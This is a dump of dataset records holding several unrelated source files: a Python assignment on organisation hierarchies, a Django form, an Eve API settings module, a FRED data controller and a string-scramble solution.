20000, 25)\n >>> e1.become_subordinate(e2)\n >>> e2.become_subordinate(e3)\n >>> e4.become_subordinate(e3)\n >>> e3.remove_head().name\n 'Sue Perior'\n >>> [e.name for e in e2.get_direct_subordinates()]\n ['Emma Ployee', 'Mane Gerr']\n \"\"\"\n new_head = self.get_highest_rated_subordinate()\n self.remove_subordinate_id(new_head.eid)\n new_head.become_subordinate(None)\n for s in self.get_direct_subordinates():\n s.become_subordinate(new_head)\n self._subordinates = []\n return new_head\n\n def obtain_subordinates(self, ids: List[int]) -> Employee:\n \"\"\"Set the employees with IDs in as subordinates of this Employee.\n\n If those employees have subordinates, the superior of those subordinates\n becomes the employee's original superior.\n\n Return this Employee.\n\n Pre-condition: this Employee's id is not in .\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> e3 = Leader(3, \"Bigg Boss\", \"CEO\", 50000, 60, \"Company\")\n >>> e4 = Employee(4, \"Mane Gerr\", \"Manager\", 20000, 25)\n >>> e1.become_subordinate(e2)\n >>> e2.become_subordinate(e3)\n >>> e4.become_subordinate(e3)\n >>> e4.obtain_subordinates([2]).name\n 'Mane Gerr'\n >>> [e.name for e in e4.get_all_subordinates()]\n ['Sue Perior']\n >>> [e.name for e in e2.get_all_subordinates()]\n []\n >>> [e.name for e in e3.get_direct_subordinates()]\n ['Emma Ployee', 'Mane Gerr']\n \"\"\"\n for i in ids:\n curr = self.get_organization_head().get_employee(i)\n if curr.get_superior() is None:\n curr.remove_head()\n else:\n curr.get_superior().remove_subordinate_id(curr.eid)\n for s in curr.get_direct_subordinates():\n s.become_subordinate(curr.get_superior())\n curr.become_subordinate(self)\n curr._subordinates = []\n return self\n\n\nclass Organization:\n \"\"\"An Organization: an organization containing employees.\n\n === Private Attributes ===\n _head:\n The head of the organization.\n\n === Representation Invariants ===\n - _head is either an Employee (or subclass of Employee) or None (if there\n are no Employees).\n - No two Employees in an Organization have the same eid.\n \"\"\"\n _head: Optional[Employee]\n\n def __init__(self, head: Optional[Employee] = None) -> None:\n \"\"\"Initialize this Organization with the head .\n\n >>> o = Organization()\n >>> o.get_head() is None\n True\n \"\"\"\n self._head = head\n\n def get_employee(self, eid: int) -> Optional[Employee]:\n \"\"\"\n Return the employee with id . If no such employee exists, return\n None.\n\n >>> o = Organization()\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> o.add_employee(e1)\n >>> o.get_employee(1) is e1\n True\n >>> o.get_employee(2) is None\n True\n \"\"\"\n if self.get_head() is None:\n return None\n if self.get_head().eid == eid:\n return self.get_head()\n return self.get_head().get_employee(eid)\n\n def add_employee(self, employee: Employee, superior_id: int = None) -> None:\n \"\"\"Add to this organization as the subordinate of the\n employee with id .\n\n >>> o = Organization()\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> o.add_employee(e2)\n >>> o.get_head() is e2\n True\n >>> o.add_employee(e1, 2)\n >>> o.get_employee(1) is e1\n True\n >>> e1.get_superior() is e2\n True\n \"\"\"\n if superior_id is None:\n if self.get_head() is not None:\n self.get_head().become_subordinate(employee)\n self._head = employee\n else:\n employee.become_subordinate(self.get_employee(superior_id))\n\n def get_average_salary(self, position: Optional[str] = None) -> float:\n \"\"\"Returns the average salary of all employees in the organization with\n the position .\n\n If is None, this returns the average salary of all employees.\n\n If there are no such employees, return 0.0\n\n >>> o = Organization()\n >>> o.get_average_salary()\n 0.0\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> o.add_employee(e2)\n >>> o.add_employee(e1, 2)\n >>> o.get_average_salary()\n 15000.0\n \"\"\"\n num = 0\n total = 0\n if self.get_head() is not None:\n for s in merge([self.get_head()],\n self.get_head().get_all_subordinates()):\n if position is None or s.position == position:\n num += 1\n total += s.salary\n if num == 0:\n return 0.0\n return total / num\n\n def get_head(self) -> Optional[Employee]:\n \"\"\"Return the head of the organization, or None if there are no\n employees.\n\n >>> o = Organization()\n >>> o.get_head() is None\n True\n \"\"\"\n return self._head\n\n def get_next_free_id(self) -> int:\n \"\"\"Return the smallest valid id that is not already in the organization.\n\n >>> o = Organization()\n >>> o.get_next_free_id()\n 1\n \"\"\"\n free_id = 1\n while self.get_employee(free_id) is not None:\n free_id += 1\n return free_id\n\n def get_employees_with_position(self, position: str) -> List[Employee]:\n \"\"\"Return a list of employees in the organization with the\n position named in order of increasing eids.\n\n >>> o = Organization()\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> o.add_employee(e2)\n >>> o.add_employee(e1, 2)\n >>> [e.name for e in o.get_employees_with_position(\"Manager\")]\n ['Sue Perior']\n >>> o.get_employees_with_position(\"CEO\")\n []\n \"\"\"\n result = []\n if self.get_head() is not None:\n result = [s for s in merge([self.get_head()], self.get_head().\n get_all_subordinates()) if s.position\n == position]\n return result\n\n def set_head(self, employee: Employee) -> None:\n \"\"\"If employee is the head of the organization, change\n self._head to department_head.\n\n Otherwise, do nothing.\n\n >>> o = Organization()\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> e1.become_subordinate(e2)\n >>> o.set_head(e1)\n >>> o.get_head() is None\n True\n >>> o.set_head(e2)\n >>> o.get_head().name\n 'Sue Perior'\n \"\"\"\n if employee.get_superior() is None:\n self._head = employee\n\n def fire_employee(self, eid: int) -> None:\n \"\"\"Fire the employee with ID from the organization.\n\n Pre-condition: there is an employee with the eid in\n the organization.\n\n >>> o = Organization()\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> o.add_employee(e2)\n >>> o.add_employee(e1, 2)\n >>> o.fire_employee(2)\n >>> o.get_head().name\n 'Emma Ployee'\n \"\"\"\n if self.get_head().eid == eid:\n self.set_head(self.get_head().remove_head())\n else:\n self.get_head().fire_subordinate(eid)\n\n def _find_lowest_rated_employee(self) -> Employee:\n \"\"\"Return the lowest rated employee in the organization.\n\n Pre-condition: the organization is not empty.\n\n >>> o = Organization()\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> o.add_employee(e2)\n >>> o.add_employee(e1, 2)\n >>> o._find_lowest_rated_employee().name\n 'Sue Perior'\n \"\"\"\n min_rating = 101\n min_employee = None\n for s in merge([self.get_head()],\n self.get_head().get_all_subordinates()):\n if s.rating < min_rating:\n min_rating = s.rating\n min_employee = s\n return min_employee\n\n def fire_lowest_rated_employee(self) -> None:\n \"\"\"Fire the lowest rated employee in the organization.\n\n If this organization is empty, do nothing.\n\n >>> o = Organization()\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> o.add_employee(e2)\n >>> o.add_employee(e1, 2)\n >>> o.fire_lowest_rated_employee()\n >>> o.get_head().name\n 'Emma Ployee'\n \"\"\"\n if self.get_head() is not None:\n self.fire_employee(self._find_lowest_rated_employee().eid)\n\n def fire_under_rating(self, rating: int) -> None:\n \"\"\"Fire all employees with a rating below rating.\n\n Employees are be fired in order of increasing rating: the lowest\n rated employees are to be removed first. Break ties in order of eid.\n\n >>> o = Organization()\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 80)\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> e3 = Leader(3, \"Bigg Boss\", \"CEO\", 50000, 60, \"Company\")\n >>> o.add_employee(e3)\n >>> o.add_employee(e2, 3)\n >>> o.add_employee(e1, 2)\n >>> o.fire_under_rating(75)\n >>> o.get_head().name\n 'Emma Ployee'\n >>> len(o.get_head().get_all_subordinates())\n 0\n \"\"\"\n while self.get_head() is not None and \\\n self._find_lowest_rated_employee().rating < rating:\n self.fire_lowest_rated_employee()\n\n def promote_employee(self, eid: int) -> None:\n \"\"\"Promote the employee with the eid in this organization\n until they have a superior with a higher rating than them or until they\n are the head of the organization.\n\n Precondition: There is an employee in this organization with\n eid .\n\n >>> o = Organization()\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> e3 = Leader(3, \"Bigg Boss\", \"CEO\", 50000, 60, \"Company\")\n >>> o.add_employee(e3)\n >>> o.add_employee(e2, 3)\n >>> o.add_employee(e1, 2)\n >>> o.promote_employee(1)\n >>> [(e.eid, e.name, e.position, e.salary, e.rating) for e in \\\n o.get_head().get_direct_subordinates()]\n [(1, 'Emma Ployee', 'Manager', 20000, 50)]\n >>> new_e1 = o.get_head().get_direct_subordinates()[0]\n >>> isinstance(new_e1, Leader)\n True\n >>> [(e.eid, e.name, e.position, e.salary, e.rating) for e in \\\n new_e1.get_direct_subordinates()]\n [(2, 'Sue Perior', 'Worker', 10000, 30)]\n \"\"\"\n curr = self.get_employee(eid)\n while curr.get_superior() is not None and \\\n curr.rating >= curr.get_superior().rating:\n curr = curr.swap_up()\n self.set_head(curr)\n\n def get_average_salary_department(self, department: str) -> float:\n \"\"\"Returns the average salary of all employees in the organization in\n department , but not in subdepartment ).\n\n If there are no such employees, return 0.0\n\n >>> o = Organization()\n >>> o.get_average_salary_department(\"Department\")\n 0.0\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> e3 = Leader(3, \"Bigg Boss\", \"CEO\", 30000, 60, \"Company\")\n >>> o.add_employee(e3)\n >>> o.add_employee(e2, 3)\n >>> o.add_employee(e1, 2)\n >>> o.get_average_salary_department(\"Department\")\n 15000.0\n >>> o.get_average_salary_department(\"Company\")\n 30000.0\n \"\"\"\n num = 0\n total = 0\n if self.get_head() is not None:\n for s in merge([self.get_head()],\n self.get_head().get_all_subordinates()):\n if s.get_department_name2() == department:\n num += 1\n total += s.salary\n if num == 0:\n return 0.0\n return total / num\n\n\nclass Leader(Employee):\n \"\"\"A subclass of Employee. The leader of a department in an organization.\n\n === Private Attributes ===\n _department_name:\n The name of the department this Leader is the head of.\n\n === Inherited Attributes ===\n eid:\n The ID number of the employee. Within an organization, each employee ID\n number is unique.\n name:\n The name of the Employee.\n position:\n The name of the Employee's position within the organization.\n salary:\n The salary of the Employee.\n rating:\n The rating of the Employee.\n _superior:\n The superior of the Employee in the organization.\n _subordinates:\n A list of the Employee's direct subordinates (Employees that work under\n this Employee).\n\n === Representation Invariants ===\n - All Employee RIs are inherited.\n - Department names are unique within an organization.\n \"\"\"\n _department_name: str\n\n def __init__(self, eid: int, name: str, position: str, salary: float,\n rating: int, department: str) -> None:\n \"\"\"Initialize this Leader with the ID , name , position\n , salary , rating , and department name\n .\n\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> e2.name\n 'Sue Perior'\n >>> e2.get_department_name()\n 'Department'\n \"\"\"\n Employee.__init__(self, eid, name, position, salary, rating)\n self._department_name = department\n\n def get_department_name(self) -> str:\n \"\"\"Return the name of the department this leader is the head of.\n\n Note: This method overrides Employee.get_department_name.\n\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> e2.name\n 'Sue Perior'\n >>> e2.get_department_name()\n 'Department'\n \"\"\"\n return self._department_name\n\n def get_department_employees(self) -> List[Employee]:\n \"\"\"Return a list of employees in the leader's department.\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> e3 = Leader(3, \"Bigg Boss\", \"CEO\", 50000, 60, \"Company\")\n >>> e1.become_subordinate(e2)\n >>> e2.become_subordinate(e3)\n >>> [e.name for e in e3.get_department_employees()]\n ['Emma Ployee', 'Sue Perior', 'Bigg Boss']\n >>> [e.name for e in e2.get_department_employees()]\n ['Emma Ployee', 'Sue Perior']\n \"\"\"\n return merge([self], self.get_all_subordinates())\n\n def create_employee(self) -> Employee:\n \"\"\"Create and return a Employee with the same attributes as Leader.\n\n >>> l1 = Leader(1, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> e1 = l1.create_employee()\n >>> isinstance(e1, Employee)\n True\n >>> isinstance(e1, Leader)\n False\n >>> e1.name\n 'Sue Perior'\n >>> e1.get_department_name()\n ''\n \"\"\"\n return Employee(self.eid, self.name, self.position, self.salary,\n self.rating)\n\n def become_employee(self) -> Employee:\n \"\"\"Make this Leader an employee.\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> l2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> l3 = Leader(3, \"Bigg Boss\", \"CEO\", 50000, 60, \"Company\")\n >>> e1.become_subordinate(l2)\n >>> l2.become_subordinate(l3)\n >>> e2 = l2.become_employee()\n >>> e2.get_department_name()\n 'Company'\n >>> [e.name for e in l3.get_direct_subordinates()]\n ['Sue Perior']\n >>> e1.get_department_leader().name\n 'Bigg Boss'\n \"\"\"\n new_employee = self.create_employee()\n for s in self.get_direct_subordinates():\n s.become_subordinate(new_employee)\n if self.get_superior() is not None:\n self.get_superior().remove_subordinate_id(self.eid)\n new_employee.become_subordinate(self.get_superior())\n return new_employee\n\n\nclass DepartmentSalaryTree:\n \"\"\"A DepartmentSalaryTree: A tree representing the salaries of departments.\n The salaries considered only consist of employees directly in a department\n and not in any of their subdepartments.\n\n Do not change this class.\n\n === Public Attributes ===\n department_name:\n The name of the department that this DepartmentSalaryTree represents.\n salary:\n The average salary of the department that this DepartmentSalaryTree\n represents.\n subdepartments:\n The subdepartments of the department that this DepartmentSalaryTree\n represents.\n \"\"\"\n department_name: str\n salary: float\n subdepartments: [DepartmentSalaryTree]\n\n def __init__(self, department_name: str, salary: float,\n subdepartments: List[DepartmentSalaryTree]) -> None:\n \"\"\"Initialize this DepartmentSalaryTree with the department name\n , salary , and the subdepartments\n .\n\n >>> d = DepartmentSalaryTree('Department', 30000, [])\n >>> d.department_name\n 'Department'\n \"\"\"\n self.department_name = department_name\n self.salary = salary\n self.subdepartments = subdepartments[:]\n\n\ndef create_department_salary_tree(organization: Organization) -> \\\n Optional[DepartmentSalaryTree]:\n \"\"\"Return the DepartmentSalaryTree corresponding to .\n\n If has no departments, return None.\n\n Pre-condition: If there is at least one department in ,\n then the head of is also a Leader.\n\n >>> o = Organization()\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> e3 = Leader(3, \"Bigg Boss\", \"CEO\", 50000, 60, \"Company\")\n >>> o.add_employee(e2)\n >>> o.add_employee(e1, 2)\n >>> o.add_employee(e3)\n >>> dst = create_department_salary_tree(o)\n >>> dst.department_name\n 'Company'\n >>> dst.salary\n 50000.0\n >>> dst.subdepartments[0].department_name\n 'Department'\n >>> dst.subdepartments[0].salary\n 15000.0\n \"\"\"\n if organization.get_head() is None or \\\n organization.get_head().get_department_name2() is None:\n return None\n return _create_dst_helper(organization.get_head(), organization)[0]\n\n\ndef _create_dst_helper(employee: Employee, organization: Organization) \\\n -> List[DepartmentSalaryTree]:\n \"\"\"Return the DepartmentSalaryTree corresponding to Employee \n in Organization if Employee is a Leader, otherwise return a\n list of the DepartmentSalaryTrees of Employee 's direct\n subordinates.\n \"\"\"\n department_dst = []\n for s in employee.get_direct_subordinates():\n department_dst.extend(\n _create_dst_helper(s, organization))\n if isinstance(employee, Leader):\n return([DepartmentSalaryTree(employee.get_department_name(),\n organization.get_average_salary_department(\n employee.get_department_name2()),\n department_dst)])\n else:\n return department_dst\n\n\ndef create_organization_from_file(file: TextIO) -> Organization:\n \"\"\"Return the Organization represented by the information in .\n\n >>> o = create_organization_from_file(open('employees.txt'))\n >>> o.get_head().name\n 'Alice'\n \"\"\"\n o = Organization()\n employee_list = []\n subordinate_list = []\n for line in file:\n line = line.replace(\"\\n\", \"\")\n content = line.split(\",\")\n subordinate_list.append(content[5])\n if len(content) == 6:\n employee_list.append(Employee(int(content[0]), content[1],\n content[2], float(content[3]),\n int(content[4])))\n else:\n employee_list.append(Leader(int(content[0]), content[1],\n content[2], float(content[3]),\n int(content[4]), content[6]))\n for i in range(len(employee_list)):\n if subordinate_list[i] == \"\":\n o.set_head(employee_list[i])\n else:\n # superior_employee = None\n # for e in employee_list:\n # if subordinate_list[i] == e.eid:\n # superior_employee = e\n # employee_list[i].become_subordinate(superior_employee)\n employee_list[i].become_subordinate(_find_employee_with_eid(\n employee_list, int(subordinate_list[i])))\n return o\n\n\ndef _find_employee_with_eid(employee_list: List[Employee], eid: int) \\\n -> Optional[Employee]:\n \"\"\"Find and return the employee in the list with eid ,\n or None if there is no employee with eid .\n \"\"\"\n for e in employee_list:\n if eid == e.eid:\n return e\n return None\n\nif __name__ == \"__main__\":\n import doctest\n\n doctest.testmod()\n\n import python_ta\n\n python_ta.check_all(config={\n 'allowed-import-modules': ['python_ta', 'doctest', 'typing',\n '__future__'],\n 'max-args': 7})\n","sub_path":"organization_hierarchy.py","file_name":"organization_hierarchy.py","file_ext":"py","file_size_in_byte":49086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"340075410","text":"#\n# farmwork/forms.py\n#\n\nfrom django import forms\nfrom django.utils.text import slugify\nfrom .models import Farmwork\n\n\n# ========================================================\n# FARMWORK FORM\n# ========================================================\n\nclass FarmworkForm(forms.ModelForm):\n\n def __init__(self, *args, **kwargs):\n super(FarmworkForm, self).__init__(*args, **kwargs)\n\n class Meta:\n model = Farmwork\n fields = [\n 'job_role',\n 'job_fruit',\n 'job_pay',\n 'job_pay_type',\n 'job_start_date',\n 'job_duration',\n 'job_duration_type',\n 'job_description',\n 'con_first_name',\n 'con_surname',\n 'con_number',\n 'con_email',\n 'con_description',\n 'acc_variety',\n 'acc_price',\n 'acc_price_type',\n 'acc_description',\n 'loc_street_address',\n 'loc_city',\n 'loc_state',\n 'loc_post_code',\n ]\n\n # --\n # AUTO GENERATE SLUG ON SAVE\n # Credit: https://keyerror.com/blog/automatically-generating-unique-slugs-in-django\n # --\n\n def save(self):\n\n if self.instance.pk:\n return super(FarmworkForm, self).save()\n\n instance = super(FarmworkForm, self).save(commit=False)\n instance.slug = slugify(instance.get_job_fruit_display() + '-' + instance.get_job_role_display() + '-in-' + instance.loc_city)\n instance.save()\n\n return instance\n","sub_path":"backend/apps/farmwork/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"274640676","text":"# -*- encoding:utf-8 -*-\nfrom pprint import pprint\nimport os\nfrom eve_sqlalchemy.config import DomainConfig, ResourceConfig\nfrom models.all import *\n\nMY_ROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nDEBUG = True\nSQLALCHEMY_DATABASE_URI = 'sqlite:///{}'.format(os.path.join(MY_ROOT_DIR, 'db', 'data.db'))\n# SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://root:@localhost/igdv6'\n\n# SQLALCHEMY_ECHO = True\nSQLALCHEMY_TRACK_MODIFICATIONS = False\n\nEMBEDDING = True # not work\n\nDOMAIN = DomainConfig({\n 'user': ResourceConfig(User),\n 'site': ResourceConfig(Site),\n 'server': ResourceConfig(Server),\n 'module_info': ResourceConfig(ModuleInfo),\n 'midware_info': ResourceConfig(MidwareInfo),\n 'midware_script': ResourceConfig(MidwareScript),\n 'os_info': ResourceConfig(OSInfo),\n 'file_asset': ResourceConfig(FileAsset),\n 'file_sec_action': ResourceConfig(FileSecAction),\n 'file_filter': ResourceConfig(FileFilter),\n 'app_sec_action': ResourceConfig(AppSecAction),\n 'config_file': ResourceConfig(ConfigFile),\n 'task': ResourceConfig(Task),\n\n 'log': ResourceConfig(Log),\n 'snapshot': ResourceConfig(SnapShot),\n 'ilocker_rule': ResourceConfig(ILockerRule),\n 'log_rule': ResourceConfig(LogRule),\n 'OpLog': ResourceConfig(OpLog),\n\n}).render()\n\n# attributes with default value need not 'required'\n\nDOMAIN['user']['schema']['tenant_id']['required'] = False\nDOMAIN['user']['schema']['servers']['schema']['data_relation']['embeddable'] = True\nDOMAIN['user']['schema']['sites']['schema']['data_relation']['embeddable'] = True\n\nDOMAIN['server']['schema']['sscan_enabled']['required'] = False\nDOMAIN['server']['schema']['pscan_enabled']['required'] = False\nDOMAIN['server']['schema']['iscan_enabled']['required'] = False\nDOMAIN['server']['schema']['pmac_enabled']['required'] = False\nDOMAIN['server']['schema']['ilocker_enabled']['required'] = False\n\nDOMAIN['site']['schema']['iwall_enabled']['required'] = False\nDOMAIN['site']['schema']['imon_enabled']['required'] = False\nDOMAIN['site']['schema']['sscan_enabled']['required'] = False\nDOMAIN['site']['schema']['pscan_enabled']['required'] = False\nDOMAIN['site']['schema']['iscan_enabled']['required'] = False\nDOMAIN['site']['schema']['pmac_enabled']['required'] = False\nDOMAIN['site']['schema']['ilocker_enabled']['required'] = False\nDOMAIN['site']['schema']['imac_enabled']['required'] = False\n\nDOMAIN['file_sec_action']['schema']['imac_deny_service']['required'] = False\nDOMAIN['file_sec_action']['schema']['ilocker_log_operation']['required'] = False\nDOMAIN['file_sec_action']['schema']['ilocker_deny_write']['required'] = False\nDOMAIN['file_sec_action']['schema']['sscan_deny_sync']['required'] = False\nDOMAIN['file_sec_action']['schema']['action_remove']['required'] = False\nDOMAIN['file_sec_action']['schema']['action_recovery']['required'] = False\nDOMAIN['file_sec_action']['schema']['scan_malicious_link']['required'] = False\nDOMAIN['file_sec_action']['schema']['action_snapshot']['required'] = False\nDOMAIN['file_sec_action']['schema']['scan_trojan']['required'] = False\nDOMAIN['file_sec_action']['schema']['scan_disguise']['required'] = False\n\nDOMAIN['file_filter']['schema']['op_negative']['required'] = False\n\nDOMAIN['app_sec_action']['schema']['imon_scan_accessibility']['required'] = False\nDOMAIN['app_sec_action']['schema']['imon_scan_accuracy']['required'] = False\nDOMAIN['app_sec_action']['schema']['imon_scan_timeliness']['required'] = False\nDOMAIN['app_sec_action']['schema']['imon_scan_extlink']['required'] = False\nDOMAIN['app_sec_action']['schema']['iwall_action_block']['required'] = False\nDOMAIN['app_sec_action']['schema']['iwall_cata_attack_tech']['required'] = False\nDOMAIN['app_sec_action']['schema']['iwall_cata_sensitive_obj']['required'] = False\nDOMAIN['app_sec_action']['schema']['iwall_cata_restricted_protocol']['required'] = False\n\nDOMAIN['ilocker_rule']['schema']['cmdline']['required'] = False\nDOMAIN['ilocker_rule']['schema']['username']['required'] = False\nDOMAIN['ilocker_rule']['schema']['exe_path']['required'] = False\nDOMAIN['ilocker_rule']['schema']['action_snapshot']['required'] = False\nDOMAIN['ilocker_rule']['schema']['phase']['required'] = False\nDOMAIN['ilocker_rule']['schema']['phase_order_id']['required'] = False\nDOMAIN['ilocker_rule']['schema']['ignore_case']['required'] = False\nDOMAIN['ilocker_rule']['schema']['deleted']['required'] = False\n\n# dynamic relation cannot be json serialized\nDOMAIN['server']['datasource']['projection']['module_info'] = 0\nDOMAIN['server']['datasource']['projection']['midware_info'] = 0\nDOMAIN['server']['datasource']['projection']['tasks_isync'] = 0\nDOMAIN['server']['datasource']['projection']['tasks_staging'] = 0\nDOMAIN['server']['datasource']['projection']['config_files'] = 0\nDOMAIN['server']['datasource']['projection']['ilocker_rules'] = 0\nDOMAIN['server']['datasource']['projection']['log_rules'] = 0\nDOMAIN['server']['datasource']['projection']['snapshots'] = 0\nDOMAIN['server']['datasource']['projection']['app_sec_action'] = 0\n\nDOMAIN['site']['datasource']['projection']['ilocker_rules'] = 0\nDOMAIN['site']['datasource']['projection']['app_sec_action'] = 0\nDOMAIN['site']['datasource']['projection']['tasks'] = 0\nDOMAIN['site']['schema']['servers']['schema']['data_relation']['embeddable'] = True\nDOMAIN['site']['schema']['file_assets']['schema']['data_relation']['embeddable'] = True\nDOMAIN['site']['schema']['owner']['data_relation']['embeddable'] = True\n\nDOMAIN['midware_info']['datasource']['projection']['ilocker_rules'] = 0\n\n# DOMAIN['file_asset']['datasource']['projection']['sec_actions'] = 0\nDOMAIN['file_asset']['datasource']['projection']['trusted_sync_filters'] = 0\nDOMAIN['file_asset']['datasource']['projection']['ilocker_rules'] = 0\n\nDOMAIN['file_sec_action']['datasource']['projection']['file_filters'] = 0\n\n# embedded resource\nDOMAIN['file_asset']['schema']['sec_actions']['schema']['data_relation']['embeddable'] = True\nDOMAIN['file_asset']['schema']['server']['data_relation']['embeddable'] = True\nDOMAIN['file_asset']['schema']['site']['data_relation']['embeddable'] = True\n\nDOMAIN['snapshot']['schema']['server']['data_relation']['embeddable'] = True\n\nDOMAIN['server']['schema']['os_info']['data_relation']['embeddable'] = True\nDOMAIN['server']['schema']['owner']['data_relation']['embeddable'] = True\nDOMAIN['server']['schema']['sites']['schema']['data_relation']['embeddable'] = True\nDOMAIN['server']['schema']['file_assets']['schema']['data_relation']['embeddable'] = True\n\n# methods\nDOMAIN['task']['item_methods'] = ['GET']\n\nDATE_FORMAT = '%Y-%m-%d %H:%M:%S'\n\nRENDERERS = [\n 'eve.render.JSONRenderer',\n]\nHATEOAS = False\n\n# API_VERSION = 'v1'\n\nRESOURCE_METHODS = ['GET', 'POST', 'DELETE']\nITEM_METHODS = ['GET', 'PUT', 'PATCH', 'DELETE']\nIF_MATCH = False # disable etag\n\nALLOW_UNKNOWN = True # for user.password_hash updated by password\n\nX_DOMAINS = '*'\nX_HEADERS = '*'\n\nOPLOG = True\nOPLOG_NAME = 'OpLog'\nOPLOG_ENDPOINT = 'OpLog'\nOPLOG_RETURN_EXTRA_FIELD = True\nOPLOG_METHODS = ['DELETE', 'POST', 'PATCH', 'PUT', 'GET']\n\nURL_PREFIX = 'api'\n\nINSTALLER_DIR = os.path.join(MY_ROOT_DIR, 'installer')\nVAULT_DIR = os.path.join(MY_ROOT_DIR, 'vault')\nSTATIC_FOLDER = os.path.join(MY_ROOT_DIR, 'static')\n\nPEM_FILE = None\nPEM_PASSWORD = None\n\nSERVER_CONFIG = {\n 'bind': '0.0.0.0:5000',\n 'workers': 2,\n 'daemon': True,\n 'pid': os.path.join(MY_ROOT_DIR, 'log', 'web.pid'),\n 'graceful-timeout': 3,\n}\n\n\ndef load_conf(conf_file):\n try:\n with open(conf_file, 'r') as f:\n return json.load(f)\n except Exception as e:\n print(e)\n return {}\n\n\n# update config from config file\n_conf_file = os.path.join(MY_ROOT_DIR, 'conf', 'web.json')\n_d_conf = load_conf(_conf_file)\nPEM_FILE = _d_conf.get('pem_file', PEM_FILE)\nPEM_PASSWORD = _d_conf.get('pem_password', PEM_PASSWORD)\nSERVER_CONFIG.update(_d_conf.get('server', {}))\n\nWSS_CONFIG = {\n 'address': '127.0.0.1',\n 'port': 36666,\n}\n\n_conf_file = os.path.join(MY_ROOT_DIR, 'conf', 'wsserver.json')\n_d_conf = load_conf(_conf_file)\nWSS_CONFIG.update(_d_conf)\nif WSS_CONFIG['address'] == '0.0.0.0' or WSS_CONFIG['address'] == '*':\n WSS_CONFIG['address'] = '127.0.0.1'\n","sub_path":"api/common/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":8182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"566993616","text":"#!/usr/bin/python\nimport math\n\ndef mkSameLen(num1,num2):\n '''\n Given two numbers of different length, this function pads zeros\n to the smaller number and returns the numbers\n '''\n \n l1 = len(num1)\n l2 = len(num2)\n diff = abs(l1-l2)\n if(l1 \",\n completer=completer,\n )\n else:\n an_input = input(f\"{get_flair()} (fred)> \")\n try:\n process_input = fred_controller.switch(an_input)\n\n if process_input is not None:\n return process_input\n\n except SystemExit:\n print(\"The command selected doesn't exist\\n\")\n continue\n","sub_path":"gamestonk_terminal/fred/fred_controller.py","file_name":"fred_controller.py","file_ext":"py","file_size_in_byte":4315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"20151443","text":"\"\"\"\nGiven a string s1, we may represent it as a binary tree by partitioning it to\ntwo non-empty substrings recursively.\n\"\"\"\n\nclass Solution(object):\n def __init__(self):\n self.dic = {}\n\n def isScramble(self, s1, s2):\n if (s1, s2) in self.dic:\n return self.dic[(s1, s2)]\n if len(s1) != len(s2) or sorted(s1) != sorted(s2): # prunning\n self.dic[(s1, s2)] = False\n return False\n if s1 == s2:\n self.dic[(s1, s2)] = True\n return True\n for i in range(1, len(s1)):\n if (self.isScramble(s1[:i], s2[:i]) and self.isScramble(s1[i:], s2[i:])) or \\\n (self.isScramble(s1[:i], s2[-i:]) and self.isScramble(s1[i:], s2[:-i])):\n return True\n self.dic[(s1, s2)] = False\n return False\n\n def isScramble2(self, s1, s2):\n \"\"\"\n :type s1: str\n :type s2: str\n :rtype: bool\n \"\"\"\n if s1 == s2:\n return True\n\n n = len(s1)\n count = [0] * 26\n for i in range(n):\n count[ord(s1[i])- 97] += 